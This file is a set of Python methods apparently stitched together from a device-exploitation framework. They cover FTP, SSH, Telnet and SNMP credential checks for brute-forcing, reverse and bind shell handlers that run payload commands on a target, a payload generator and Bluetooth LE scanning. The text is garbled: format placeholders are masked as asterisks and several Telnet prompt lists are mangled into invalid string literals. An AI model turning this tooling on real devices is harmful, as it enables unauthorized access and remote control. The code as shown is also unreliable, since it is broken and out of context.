def login(self, username: str, password: str) -> bool:
""" Login to FTP server
:param str username: FTP account username
:param str password: FTP account password
:return bool: True if login was successful, False otherwise
"""
try:
self.ftp_client.login(username, password)
print_success(
self.peer,
"FTP Authentication Successful - Username: '******' Password: '******'"
.format(username, password),
verbose=self.verbosity)
return True
except Exception:
print_error(
self.peer,
"FTP Authentication Failed - Username: '******' Password: '******'".
format(username, password),
verbose=self.verbosity)
self.ftp_client.close()
return False
def reverse_tcp(self):
all_interfaces = "0.0.0.0"
sock = self.listen(all_interfaces, self.options["lport"])
if self.port_used:
print_error("Could not set up listener on {}:{}".format(
all_interfaces, self.options["lport"]))
return
# execute binary
commands = self.build_commands()
print_status("Executing payload on the device")
# synchronized commands
for command in commands[:-1]:
self.exploit.execute(command)
# asynchronous last command to execute binary & rm binary
thread = threading.Thread(target=self.exploit.execute,
args=(commands[-1], ))
thread.start()
# waiting for shell
print_status("Waiting for reverse shell...")
client, addr = sock.accept()
sock.close()
print_status("Connection from {}:{}".format(addr[0], addr[1]))
print_success("Enjoy your shell")
t = telnetlib.Telnet()
t.sock = client
t.interact()
def _windows_shell(self, chan: paramiko.channel.Channel) -> None:
""" Start Windows shell with SSH server
:param paramiko.channel.Channel chan: channel for communicating with SSH server
:return None:
"""
def writeall(sock):
while True:
data = sock.recv(256)
if not data:
sys.stdout.flush()
return
sys.stdout.write(data)
sys.stdout.flush()
writer = threading.Thread(target=writeall, args=(chan, ))
writer.start()
try:
while True:
d = sys.stdin.read(1)
if not d:
break
chan.send(d)
except Exception as err:
print_error("Error", err, verbose=self.verbosity)
def bind_tcp(self):
# execute binary
commands = self.build_commands()
# synchronized commands
for command in commands[:-1]:
self.exploit.execute(command)
# asynchronous last command to execute binary & rm binary
thread = threading.Thread(target=self.exploit.execute,
args=(commands[-1], ))
thread.start()
# connecting to shell
print_status("Connecting to {}:{}".format(self.options['rhost'],
self.options['rport']))
time.sleep(2)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.options["rhost"], int(self.options["rport"])))
except socket.error:
print_error("Could not connect to {}:{}".format(
self.options["rhost"], self.options["rport"]))
return
print_success("Enjoy your shell")
tn = telnetlib.Telnet()
tn.sock = sock
tn.interact()
def __init__(self,
udp_target: str,
udp_port: int,
verbosity: bool = False) -> None:
""" UDP client constructor
:param str udp_target: target UDP server ip address
:param int udp_port: target UDP server port
:param bool verbosity: display verbose output
:return None:
"""
self.udp_target = udp_target
self.udp_port = udp_port
self.verbosity = verbosity
self.peer = "{}:{}".format(self.udp_target, self.udp_port)
if is_ipv4(self.udp_target):
self.udp_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
elif is_ipv6(self.udp_target):
self.udp_client = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
else:
print_error("Target address is not valid IPv4 nor IPv6 address",
verbose=self.verbosity)
return None
self.udp_client.settimeout(UDP_SOCKET_TIMEOUT)
def run(self):
print_status("Generating payload")
try:
data = self.generate()
except OptionValidationError as e:
print_error(e)
return
if self.output == "elf":
with open(self.filepath, "wb+") as f:
print_status("Building ELF payload")
content = self.generate_elf(data)
print_success("Saving file {}".format(self.filepath))
f.write(content)
elif self.output == "c":
print_success("Bulding payload for C")
content = self.generate_c(data)
print_info(content)
elif self.output == "python":
print_success("Building payload for python")
content = self.generate_python(data)
print_info(content)
else:
raise OptionValidationError("No such option as {}".format(
self.output))
return content
def http_request(self, method: str, path: str, session: requests = requests, **kwargs) -> requests.Response:
""" Requests HTTP resource
:param str method: method that should be issued e.g. GET, POST
:param str path: path to the resource that should be requested
:param requests session: session manager that should be used
:param kwargs: kwargs passed to request method
:return Response: Response object
"""
if self.ssl:
url = "https://"
else:
url = "http://"
url += "{}:{}{}".format(self.target, self.port, path)
kwargs.setdefault("timeout", HTTP_TIMEOUT)
kwargs.setdefault("verify", False)
kwargs.setdefault("allow_redirects", False)
try:
return getattr(session, method.lower())(url, **kwargs)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: {}".format(url), verbose=self.verbosity)
except requests.exceptions.ConnectionError:
print_error("Connection error: {}".format(url), verbose=self.verbosity)
except requests.RequestException as error:
print_error(error, verbose=self.verbosity)
except socket.error as err:
print_error(err, verbose=self.verbosity)
except KeyboardInterrupt:
print_error("Module has been stopped", verbose=self.verbosity)
return None
def send(self, data: bytes) -> bool:
""" Send data to TCP server
:param bytes data: data that should be sent to TCP server
:return bool: True if sending data was successful, False otherwise
"""
try:
self.tcp_client.send(data)
return True
except Exception as err:
print_error(self.peer, "TCP Error while sending data", err, verbose=self.verbosity)
return False
def close(self) -> bool:
""" Close connection to TCP server
:return bool: True if closing connection was successful, False otherwise
"""
try:
self.tcp_client.close()
return True
except Exception as err:
print_error(self.peer, "TCP Error while closing tcp socket", err, verbose=self.verbosity)
return False
def login_pkey(self,
username: str,
priv_key: str,
retries: int = 1) -> bool:
""" Login to SSH server with private key
:param str username: SSH account username
:param str priv_key: SSH account private key
:param int retries: number of login retries
:return bool: True if login was successful, False otherwise
"""
if "DSA PRIVATE KEY" in priv_key:
priv_key = paramiko.DSSKey.from_private_key(io.StringIO(priv_key))
elif "RSA PRIVATE KEY" in priv_key:
priv_key = paramiko.RSAKey.from_private_key(io.StringIO(priv_key))
else:
return False
for _ in range(retries):
try:
self.ssh_client.connect(self.ssh_target,
self.ssh_port,
timeout=SSH_TIMEOUT,
banner_timeout=SSH_TIMEOUT,
username=username,
pkey=priv_key,
look_for_keys=False)
except paramiko.AuthenticationException:
print_error(
self.peer,
"SSH Authentication Failed - Username: '******' auth with private key"
.format(username),
verbose=self.verbosity)
except Exception as err:
print_error(
self.peer,
"SSH Error while authenticated by using private key",
err,
verbose=self.verbosity)
else:
print_success(
self.peer,
"SSH Authentication Successful - Username: '******' with private key"
.format(username),
verbose=self.verbosity)
return True
self.ssh_client.close()
return False
def connect(self) -> bool:
""" Connect to TCP server
:return bool: True if connection was successful, False otherwise
"""
try:
self.tcp_client.connect((self.tcp_target, self.tcp_port))
print_status(self.peer, "TCP Connection established", verbose=self.verbosity)
return True
except Exception as err:
print_error(self.peer, "TCP Error while connecting to the server", err, verbose=self.verbosity)
return False
def recv(self, num: int) -> bytes:
""" Receive data from TCP server
:param int num: number of bytes that should be received from the server
:return bytes: data that was received from the server
"""
try:
response = self.tcp_client.recv(num)
return response
except Exception as err:
print_error(self.peer, "TCP Error while receiving data", err, verbose=self.verbosity)
return None
def login(self, username: str, password: str, retries: int = 1) -> bool:
""" Login to Telnet server
:param str username: Telnet account username
:param str password: Telnet account password
:param int retries: number of authentication retries
:return bool: True if login was successful, False otherwise
"""
for _ in range(retries):
try:
if not self.connect():
continue
self.telnet_client.expect(
[b"Login: "******"login: "******"Username: "******"username: "******"utf-8") + b"\r\n")
self.telnet_client.expect([b"Password: "******"password: "******"utf-8") + b"\r\n")
self.telnet_client.write(b"\r\n")
(i, obj,
res) = self.telnet_client.expect([b"Incorrect", b"incorrect"],
5)
if i == -1 and any([
x in res for x in [b"#", b"$", b">"]
]) or len(res) > 500: # big banner e.g. mikrotik
print_success(
self.peer,
"Telnet Authentication Successful - Username: '******' Password: '******'"
.format(username, password),
verbose=self.verbosity)
return True
else:
print_error(
self.peer,
"Telnet Authentication Failed - Username: '******' Password: '******'"
.format(username, password),
verbose=self.verbosity)
break
except Exception as err:
print_error(self.peer,
"Telnet Error while authenticating to the server",
err,
verbose=self.verbosity)
return False
def close(self) -> bool:
""" Close UDP connection
:return bool: True if connection was closed successful, False otherwise
"""
try:
self.udp_client.close()
return True
except Exception as err:
print_error(self.peer,
"Error while closing udp socket",
err,
verbose=self.verbosity)
return False
def close(self) -> bool:
""" Close SSH connection
:return bool: True if closing connection was successful, False otherwise
"""
try:
self.ssh_client.close()
return True
except Exception as err:
print_error(self.peer,
"SSH Error while closing connection",
err,
verbose=self.verbosity)
return False
def send(self, data: bytes) -> bool:
""" Send UDP data
:param bytes data: data that should be sent to the server
:return bool: True if data was sent, False otherwise
"""
try:
self.udp_client.sendto(data, (self.udp_target, self.udp_port))
return True
except Exception as err:
print_error(self.peer,
"Error while sending data",
err,
verbose=self.verbosity)
return False
def read_until(self, data: bytes) -> bytes:
""" Read until specified data found in response
:param bytes data: bytes until which data should be read
:return bytes: bytes read until data
"""
try:
response = self.telnet_client.read_until(data, 5)
return response
except Exception as err:
print_error(self.peer,
"Telnet Error while reading data from the server",
err,
verbose=self.verbosity)
return None
def write(self, data: bytes) -> bool:
""" Write data to Telnet server
:param bytes data: data that should be written to Telnet server
:return bool: True if data was written successfuly, False otherwise
"""
try:
self.telnet_client.write(data, 5)
return True
except Exception as err:
print_error(self.peer,
"Telnet Error while writing to the server",
err,
verbose=self.verbosity)
return False
def execute(self, cmd: str) -> str:
""" Execute command on SSH server
:param str cmd: command to execute on SSH server
:return str: command output
"""
try:
ssh_stdin, ssh_stdout, ssh_stderr = self.ssh_client.exec_command(
cmd)
return ssh_stdout.read()
except Exception as err:
print_error(self.peer,
"SSH Error while executing command on the server",
err,
verbose=self.verbosity)
return None
def connect(self) -> bool:
""" Connect to Telnet server
:return bool: True if connection was successful, False otherwise
"""
try:
self.telnet_client = telnetlib.Telnet(self.telnet_target,
self.telnet_port,
timeout=TELNET_TIMEOUT)
return True
except Exception as err:
print_error(self.peer,
"Telnet Error while connecting to the server",
err,
verbose=self.verbosity)
return False
def get(self,
community_string: str,
oid: str,
version: int = 1,
retries: int = 0) -> bytes:
""" Get OID from SNMP server
:param str community_string: SNMP server communit string
:param str oid: SNMP server oid
:param int version: SNMP protocol version
:param int retries: number of retries
:return bytes: SNMP server response
"""
cmdGen = cmdgen.CommandGenerator()
try:
errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd(
cmdgen.CommunityData(community_string, mpModel=version),
cmdgen.UdpTransportTarget((self.snmp_target, self.snmp_port),
timeout=SNMP_TIMEOUT,
retries=retries),
oid,
)
except Exception as err:
print_error(self.peer,
"SNMP Error while accessing server",
err,
verbose=self.verbosity)
return None
if errorIndication or errorStatus:
print_error(
self.peer,
"SNMP invalid community string: '{}'".format(community_string),
verbose=self.verbosity)
else:
print_success(self.peer,
"SNMP valid community string found: '{}'".format(
community_string),
verbose=self.verbosity)
return varBinds
return None
def send_file(self, local_file: str, dest_file: str) -> bool:
""" Send file to SSH server
:param str local_file: local file that should be send to SSH server
:param str dest_file: destination file that content should be saved to
:return bool: True if sending file was successful, False otherwise
"""
try:
sftp = self.ssh_client.open_sftp()
sftp.put(local_file, dest_file)
return True
except Exception as err:
print_error(self.peer,
"SSH Error while sending file to the server",
err,
verbose=self.verbosity)
return False
def enumerate_services(self):
print_status("Starting enumerating {} ({} dBm) ...".format(
self.addr, self.rssi))
try:
dev = Peripheral(self, self.addrType)
services = sorted(dev.services, key=lambda s: s.hndStart)
data = []
for service in services:
if service.hndStart == service.hndEnd:
continue
data.append([
"{:04x} -> {:04x}".format(service.hndStart,
service.hndEnd),
self._get_svc_description(service),
"",
"",
])
for _, char in enumerate(service.getCharacteristics()):
desc = self._get_char_description(char)
props = char.propertiesToString()
hnd = char.getHandle()
value = self._get_char(char, props)
data.append(["{:04x}".format(hnd), desc, props, value])
dev.disconnect()
return data
except Exception as err:
print_error(err)
try:
dev.disconnect()
except Exception as err:
print_error(err)
return None
def get_content(self, remote_file: str) -> str:
""" Get remote file from FTP server
:param str remote_file: remote file name
:return str: remote file content
"""
try:
fp_content = io.BytesIO()
self.ftp_client.retrbinary("RETR {}".format(remote_file),
fp_content.write)
return fp_content.getvalue()
except Exception as err:
print_error(self.peer,
"FTP Error while retrieving content",
err,
verbose=self.verbosity)
return None
def login(self, username: str, password: str, retries: int = 1) -> bool:
""" Login to SSH server
:param str username: SSH account username
:param str password: SSH account password
:param int retries: number of login retries
:return bool: True if login was successful, False otherwise
"""
for _ in range(retries):
try:
self.ssh_client.connect(self.ssh_target,
self.ssh_port,
timeout=SSH_TIMEOUT,
banner_timeout=SSH_TIMEOUT,
username=username,
password=password,
look_for_keys=False)
except paramiko.AuthenticationException:
print_error(
self.peer,
"SSH Authentication Failed - Username: '******' Password: '******'"
.format(username, password),
verbose=self.verbosity)
self.ssh_client.close()
break
except Exception as err:
print_error(self.peer,
"SSH Error while authenticating",
err,
verbose=self.verbosity)
else:
print_success(
self.peer,
"SSH Authentication Successful - Username: '******' Password: '******'"
.format(username, password),
verbose=self.verbosity)
return True
self.ssh_client.close()
return False
def get_file(self, remote_file: str, local_file: str) -> bool:
""" Get file from SSH server
:param str remote_file: remote file on SSH server
:param str local_file: local file that it should be saved to
:return bool: True if getting file was successful, False otherwise
"""
try:
sftp = self.ssh_client.open_sftp()
sftp.get(remote_file, local_file)
return True
except Exception as err:
print_error(self.peer,
"SSH Error while retrieving file from the server",
err,
verbose=self.verbosity)
return False
def send_content(self, content: str, dest_file: str) -> bool:
""" Send file content to SSH server
:param str content: data that should be sent to SSH file
:param str dst_file: destination file that data should be saved to
:return bool: True if sending file content was successful, False otherwise
"""
try:
fp_content = io.BytesIO(content)
sftp = self.ssh_client.open_sftp()
sftp.putfo(fp_content, dest_file)
return True
except Exception as err:
print_error(self.peer,
"SSH Error while sending content to the server",
err,
verbose=self.verbosity)
return False
def btle_scan(self, mac=None):
""" Scans for Bluetooth Low Energy devices """
options = Options(self.buffering, mac, self.enum_services)
scanner = BTLEScanner(options.mac).withDelegate(ScanDelegate(options))
if options.mac:
print_status("Scanning BTLE device...")
else:
print_status("Scanning for BTLE devices...")
devices = []
try:
devices = [res for res in scanner.scan(self.scan_time)]
except Exception as err:
print_error("Error: {}".format(err))
print_error("Check if your bluetooth hardware is connected")
return devices
def get_content(self, remote_file: str) -> str:
""" Get file content from SSH server
:param str remote_file: remote file on SSH server
:return str: file content from SSH server
"""
try:
fp_content = io.BytesIO()
sftp = self.ssh_client.open_sftp()
sftp.getfo(remote_file, fp_content)
return fp_content.getvalue()
except Exception as err:
print_error(
self.peer,
"SSH Error while retrieving file content from the server",
err,
verbose=self.verbosity)
return None
def test_connect(self) -> bool:
""" Test connection to Telnet server
:return bool: True if test connection was successful, False otherwise
"""
try:
self.telnet_client = telnetlib.Telnet(self.telnet_target,
self.telnet_port,
timeout=TELNET_TIMEOUT)
self.telnet_client.expect(
[b"Login: "******"login: "******"Username: "******"username: "******"Telnet Error while testing connection to the server",
err,
verbose=self.verbosity)
return False
